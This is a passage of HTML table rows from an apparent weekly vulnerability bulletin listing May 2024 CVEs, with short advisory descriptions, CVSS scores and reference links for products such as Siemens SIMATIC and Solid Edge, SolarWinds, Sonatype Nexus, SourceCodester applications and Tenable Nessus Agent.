<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32741" target="_blank">CVE-2024-32741</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-273900.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC CN 4100<br> </td>
<td>A vulnerability has been identified in SIMATIC CN 4100 (All versions &lt; V3.0). The affected device contains undocumented users and credentials. An attacker could misuse the credentials to compromise the device locally or over the network.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32740&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32740" target="_blank">CVE-2024-32740</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-273900.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC CN 4100<br> </td>
<td>A vulnerability has been identified in SIMATIC CN 4100 (All versions &lt; V3.0). The affected device contains an unrestricted USB port. An attacker with local access to the device could potentially misuse the port for booting another operating system and gain complete read/write access to the filesystem.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32742&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32742" target="_blank">CVE-2024-32742</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-273900.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC RTLS Locating Manager<br> </td>
<td>A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions &lt; V3.0.1.1). The affected systems use symmetric cryptography with a hard-coded key to protect the communication between client and server. This could allow an unauthenticated remote attacker to compromise confidentiality and integrity of the communication and, subsequently, availability of the system. A successful exploit requires the attacker to gain knowledge of the hard-coded key and to be able to intercept the communication between client and server on the network.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30207&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">10</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30207" target="_blank">CVE-2024-30207</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-093430.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC RTLS Locating Manager<br> </td>
<td>A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions &lt; V3.0.1.1). Affected systems transmit client-side resources without proper cryptographic protection. This could allow an attacker to eavesdrop on and modify resources in transit. A successful exploit requires an attacker to be in the network path between the RTLS Locating Manager server and a client (MitM).</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30209&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30209" target="_blank">CVE-2024-30209</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-093430.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC RTLS Locating Manager<br> </td>
<td>A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions &lt; V3.0.1.1). The affected application assigns incorrect permissions to a user management component. This could allow a privileged attacker to escalate their privileges from the Administrators group to the Systemadministrator group.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33499&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33499" target="_blank">CVE-2024-33499</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-093430.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC RTLS Locating Manager<br> </td>
<td>A vulnerability has been identified in SIMATIC RTLS Locating Manager (6GT2780-0DA00) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-0DA30) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA10) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA20) (All versions &lt; V3.0.1.1), SIMATIC RTLS Locating Manager (6GT2780-1EA30) (All versions &lt; V3.0.1.1). Affected SIMATIC RTLS Locating Manager Clients do not properly check the integrity of update files. This could allow an unauthenticated remote attacker to alter update files in transit and trick an authorized user into installing malicious code. A successful exploit requires the attacker to be able to modify the communication between server and client on the network.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30206&amp;vector=CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30206" target="_blank">CVE-2024-30206</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-093430.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Simcenter Nastran 2306<br> </td>
<td>A vulnerability has been identified in Simcenter Nastran 2306 (All versions), Simcenter Nastran 2312 (All versions), Simcenter Nastran 2406 (All versions &lt; V2406.90). The affected applications contain a stack overflow vulnerability while parsing specially strings as argument for one of the application binaries. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33577&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33577" target="_blank">CVE-2024-33577</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-258494.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Solid Edge<br> </td>
<td>A vulnerability has been identified in Solid Edge (All versions &lt; V224.0 Update 5). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33489&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33489" target="_blank">CVE-2024-33489</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-589937.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Solid Edge<br> </td>
<td>A vulnerability has been identified in Solid Edge (All versions &lt; V224.0 Update 5). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33490&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33490" target="_blank">CVE-2024-33490</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-589937.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Solid Edge<br> </td>
<td>A vulnerability has been identified in Solid Edge (All versions &lt; V224.0 Update 5). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33491&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33491" target="_blank">CVE-2024-33491</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-589937.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Solid Edge<br> </td>
<td>A vulnerability has been identified in Solid Edge (All versions &lt; V224.0 Update 5). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33492&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33492" target="_blank">CVE-2024-33492</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-589937.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Solid Edge<br> </td>
<td>A vulnerability has been identified in Solid Edge (All versions &lt; V224.0 Update 5). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33493&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33493" target="_blank">CVE-2024-33493</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-589937.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Solid Edge<br> </td>
<td>A vulnerability has been identified in Solid Edge (All versions &lt; V224.0 Update 2). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34771&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34771" target="_blank">CVE-2024-34771</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-589937.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Solid Edge<br> </td>
<td>A vulnerability has been identified in Solid Edge (All versions &lt; V224.0 Update 4). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34772&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34772" target="_blank">CVE-2024-34772</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-589937.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Solid Edge<br> </td>
<td>A vulnerability has been identified in Solid Edge (All versions &lt; V224.0 Update 2). The affected applications contain a stack overflow vulnerability while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34773&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34773" target="_blank">CVE-2024-34773</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-589937.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Tecnomatix Plant Simulation V2302<br> </td>
<td>A vulnerability has been identified in Tecnomatix Plant Simulation V2302 (All versions &lt; V2302.0011). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted MODEL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-22974)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32639&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32639" target="_blank">CVE-2024-32639</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-923361.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Sirv--Sirv<br> </td>
<td>Improper Privilege Management vulnerability in Sirv allows Privilege Escalation.This issue affects Sirv: from n/a through 7.2.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32959&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32959" target="_blank">CVE-2024-32959</a><br><a href="https://patchstack.com/database/vulnerability/sirv/wordpress-sirv-plugin-7-2-2-arbitrary-option-update-to-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Sizam Design--Rehub<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Sizam Design Rehub allows PHP Local File Inclusion.This issue affects Rehub: from n/a through 19.6.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31231&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31231" target="_blank">CVE-2024-31231</a><br><a href="https://patchstack.com/database/vulnerability/rehub-theme/wordpress-rehub-theme-19-6-1-unauthenticated-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Sizam Design--Rehub<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Sizam Design Rehub allows PHP Local File Inclusion.This issue affects Rehub: from n/a through 19.6.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31232&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31232" target="_blank">CVE-2024-31232</a><br><a href="https://patchstack.com/database/vulnerability/rehub-theme/wordpress-rehub-theme-19-6-1-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Snow Software AB--Snow License Manager<br> </td>
<td>Improper Authentication vulnerability in Snow Software AB Snow License Manager on Windows allows a networked attacker to perform an Authentication Bypass if Active Directory Authentication is enabled.This issue affects Snow License Manager: from 9.33.2 through 9.34.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4129&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4129" target="_blank">CVE-2024-4129</a><br><a href="https://community.snowsoftware.com/s/feed/0D5Td000008dv8sKAA" target="_blank">security@snowsoftware.com</a></td>
</tr>
<tr>
<td>SolarWinds--Access Rights Manager<br> </td>
<td>The SolarWinds Access Rights Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows an authenticated user to abuse SolarWinds service resulting in remote code execution. We thank Trend Micro Zero Day Initiative (ZDI) for its ongoing partnership in coordinating with SolarWinds on responsible disclosure of this and other potential vulnerabilities.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28075&amp;vector=CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28075" target="_blank">CVE-2024-28075</a><br><a href="https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2023-2-4_release_notes.htm" target="_blank">psirt@solarwinds.com</a><br><a href="https://documentation.solarwinds.com/en/success_center/arm/content/secure-your-arm-deployment.htm" target="_blank">psirt@solarwinds.com</a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-28075" target="_blank">psirt@solarwinds.com</a></td>
</tr>
<tr>
<td>SolarWinds--Access Rights Manager<br> </td>
<td>The SolarWinds Access Rights Manager was found to contain a hard-coded credential authentication bypass vulnerability. If exploited, this vulnerability allows access to the RabbitMQ management console. We thank Trend Micro Zero Day Initiative (ZDI) for its ongoing partnership in coordinating with SolarWinds on responsible disclosure of this and other potential vulnerabilities.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-23473&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">8.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-23473" target="_blank">CVE-2024-23473</a><br><a href="https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2023-2-4_release_notes.htm" target="_blank">psirt@solarwinds.com</a><br><a href="https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23473" target="_blank">psirt@solarwinds.com</a></td>
</tr>
<tr>
<td>Sonatype--Nexus Repository<br> </td>
<td>Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4956&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4956" target="_blank">CVE-2024-4956</a><br><a href="https://support.sonatype.com/hc/en-us/articles/29416509323923" target="_blank">103e4ec9-0a87-450b-af77-479448ddef11</a></td>
</tr>
<tr>
<td>SourceCodester--Best House Rental Management System<br> </td>
<td>A vulnerability has been found in SourceCodester Best House Rental Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-265072.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5093&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5093" target="_blank">CVE-2024-5093</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/House%20Rental%20Management%20System/House%20Rental%20Management%20System%20-%20Authentication%20Bypass.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.265072" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.265072" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335712" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Best House Rental Management System<br> </td>
<td>A vulnerability was found in SourceCodester Best House Rental Management System 1.0 and classified as critical. This issue affects some unknown processing of the file view_payment.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265073 was assigned to this vulnerability.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5094&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5094" target="_blank">CVE-2024-5094</a><br><a href="https://github.com/BurakSevben/CVEs/blob/main/House%20Rental%20Management%20System/House%20Rental%20Management%20System%20-%20SQL%20Injection%20-%202.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.265073" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.265073" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335714" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Online Discussion Forum Site<br> </td>
<td>A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been rated as critical. This issue affects some unknown processing of the file registerH.php. The manipulation of the argument ima leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264455.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4920&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4920" target="_blank">CVE-2024-4920</a><br><a href="https://github.com/CveSecLook/cve/issues/27" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264455" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264455" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333477" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Online Examination System<br> </td>
<td>A vulnerability was found in SourceCodester Online Examination System 1.0. It has been rated as critical. This issue affects some unknown processing of the file registeracc.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264743.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5046&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5046" target="_blank">CVE-2024-5046</a><br><a href="https://github.com/CveSecLook/cve/issues/32" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264743" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264743" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335527" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--SchoolWebTech<br> </td>
<td>A vulnerability was found in SourceCodester SchoolWebTech 1.0. It has been classified as critical. Affected is an unknown function of the file /improve/home.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264534 is the identifier assigned to this vulnerability.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4966&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4966" target="_blank">CVE-2024-4966</a><br><a href="https://github.com/CveSecLook/cve/issues/30" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264534" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264534" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.334216" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>SourceCodester--Student Management System<br> </td>
<td>A vulnerability classified as critical has been found in SourceCodester Student Management System 1.0. Affected is an unknown function of the file /student/controller.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264744.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-5047&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5047" target="_blank">CVE-2024-5047</a><br><a href="https://github.com/I-Schnee-I/cev/blob/main/SourceCodester%20Student%20Management%20System%201.0%20controller.php%20Unrestricted%20Upload.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264744" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264744" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.335633" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>StylemixThemes--Consulting<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in StylemixThemes Consulting allows PHP Local File Inclusion.This issue affects Consulting: from n/a through 6.5.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-37385&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-37385" target="_blank">CVE-2023-37385</a><br><a href="https://patchstack.com/database/vulnerability/consulting/wordpress-consulting-theme-6-3-6-local-file-inclusion?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Tenable--Nessus Agent<br> </td>
<td>A race condition vulnerability exists where an authenticated, local attacker on a Windows Nessus Agent host could modify installation parameters at installation time, which could lead to the execution of arbitrary code on the Nessus host. - CVE-2024-3292</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3292&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3292" target="_blank">CVE-2024-3292</a><br><a href="https://www.tenable.com/security/tns-2024-09" target="_blank">vulnreport@tenable.com</a></td>
</tr>
<tr>
<td>Tenable--Nessus Agent<br> </td>
<td>When installing Nessus Agent to a directory outside of the default location on a Windows host, Nessus Agent versions prior to 10.6.4 did not enforce secure permissions for sub-directories. This could allow for local privilege escalation if users had not secured the directories in the non-default installation location.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3291&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
